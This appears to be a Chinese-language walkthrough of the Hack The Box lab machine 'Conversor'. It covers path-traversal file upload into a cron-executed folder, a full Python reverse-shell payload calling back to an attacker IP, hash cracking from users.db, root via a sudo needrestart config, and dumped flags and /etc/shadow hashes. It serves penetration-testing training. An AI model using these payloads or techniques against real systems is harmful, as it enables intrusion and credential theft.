[Season9] Conversor WP

Posted on Edited on Word count in article: 582 Reading time ≈ 2 mins.
Hack The Box [Season9] Conversor Linux Easy

User Flag

扫到存在 80 端口,需要改 hosts 访问

注册账号后登录

1
We are Conversor. Have you ever performed large scans with Nmap and wished for a more attractive display? We have the solution! All you need to do is upload your XML file along with the XSLT sheet to transform it into a more aesthetic format. If you prefer, you can also download the template we have developed here: [Download Template](http://conversor.htb/static/nmap.xslt)

应用需要上传一个 XML 文件和一个 XSLT 文件,想到可能有 XXE

about 页面中可以下载源码

由于 parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False) 限制,所以无法 XXE,尝试使用 XSLT 注入 document 读取文件也没有成功

阅读 install.md 发现

1
2
3
4
5
6
7
You can also run it with Apache using the app.wsgi file.

If you want to run Python scripts (for example, our server deletes all files older than 60 minutes to avoid system overload), you can add the following line to your /etc/crontab.

"""
* * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 "$f"; done
"""

同时应用存在目录穿越,我们可以直接写入 scripts

1
2
xml_path = os.path.join(UPLOAD_FOLDER, xml_file.filename)
xslt_path = os.path.join(UPLOAD_FOLDER, xslt_file.filename)

部分 payload,反弹 shell

1
2
3
4
Content-Disposition: form-data; name="xml_file"; filename="../scripts/l1nk.py"
Content-Type: text/xml

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.11",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

users.db 中找到 fismathack 用户

1
2
3
4
sqlite> .tables
files  users
sqlite> select * FROM users;
1|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec

hashcat 爆破得到 5b5c3ac3a1c897c94caad48e6c71fdec:Keepmesafeandwarm

su fismathack 后得到 user.txtd70d58fa65111b5a50c81aa983d1074d

Root Flag

使用 sudo -l 发现可以使用 /usr/sbin/needrestart

1
2
3
4
5
6
7
8
sudo -l
Matching Defaults entries for fismathack on conversor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User fismathack may run the following commands on conversor:
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart

root.txt

1
2
3
4
echo 'system("/bin/bash");' > test
sudo /usr/sbin/needrestart -c test
cat /root/root.txt
28c59671af7061f3da53255a430139fb

Hash

/etc/shadow

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root:$y$j9T$CxUp91Y7aNmCAg.0BrP1N1$NFfbRCjYo56DBVoop2pwSbs9snvrUGR0IEINR4qZfmB:20301:0:99999:7:::
daemon:*:19977:0:99999:7:::
bin:*:19977:0:99999:7:::
sys:*:19977:0:99999:7:::
sync:*:19977:0:99999:7:::
games:*:19977:0:99999:7:::
man:*:19977:0:99999:7:::
lp:*:19977:0:99999:7:::
mail:*:19977:0:99999:7:::
news:*:19977:0:99999:7:::
uucp:*:19977:0:99999:7:::
proxy:*:19977:0:99999:7:::
www-data:*:19977:0:99999:7:::
backup:*:19977:0:99999:7:::
list:*:19977:0:99999:7:::
irc:*:19977:0:99999:7:::
gnats:*:19977:0:99999:7:::
nobody:*:19977:0:99999:7:::
_apt:*:19977:0:99999:7:::
systemd-network:*:19977:0:99999:7:::
systemd-resolve:*:19977:0:99999:7:::
messagebus:*:19977:0:99999:7:::
systemd-timesync:*:19977:0:99999:7:::
pollinate:*:19977:0:99999:7:::
syslog:*:19977:0:99999:7:::
uuidd:*:19977:0:99999:7:::
tcpdump:*:19977:0:99999:7:::
tss:*:19977:0:99999:7:::
landscape:*:19977:0:99999:7:::
fwupd-refresh:*:19977:0:99999:7:::
usbmux:*:20300:0:99999:7:::
fismathack:$y$j9T$Em7KF.PXS5RiFQPkRzVUo.$tMXvaVSk5wpypsh250ddml9Ko./E8.7DnQSgs2AhKx2:20314:0:99999:7:::
lxd:!:20300::::::
sshd:*:20300:0:99999:7:::
_laurel:!:20382::::::